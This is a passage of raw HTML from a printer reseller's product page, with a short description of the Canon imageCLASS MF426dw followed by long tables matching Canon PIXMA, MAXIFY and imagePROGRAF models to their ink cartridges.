srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact 4-in-1 Black and White Multifunction for the smart business</strong></p><p>With cutting-edge features, the MF426dw is set to boost work productivity in the modern office.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 38ppm</li><li>Recommended monthly print volume: 750 - 4,000 pages</li><li>FPOT: 5.5secs. (A4)</li><li>Max. paper input capacity: Up to 900 sheets</li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h3>Cartridge Printers :-</h3>		\n		<table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>imagePROGRAF PRO-500</p></td><td width=\"208\"><p>Maintenance Cartridge MC-20</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY iB4170</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5070</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5170</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5370</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5470</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA E3170</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E410</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA E4270</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E470</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E477</p></td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E480</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E510</p></td><td width=\"208\"><p>CL-98 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-88 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E560</p></td><td width=\"208\"><p>CL-99 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-89 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E560 / E560R</p></td><td width=\"208\"><p>CL-99 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-89 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA G1000</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G1010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G2010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G3000</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G3010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G4010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP100</p></td><td width=\"208\"><p>CLI-36 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-35 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP110</p></td><td width=\"208\"><p>CLI-36 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-35 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP110 (with battery)</p></td><td width=\"208\"><p>CLI-36 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-35 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP1300</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA iP2770 / iP2772</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP2870S</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA iP4200</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP7270</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP8770</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iX6770</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-755XXL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iX6870</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-755XXL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG2570S</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG2577S</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MG3570</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG3670</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG7570</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP160</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP170</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP180</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP228</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP237</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP245</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP258</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP276</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MP287</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP460</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP476</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP486</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP496</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP497</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP500</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP520</p></td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP530</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP568</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 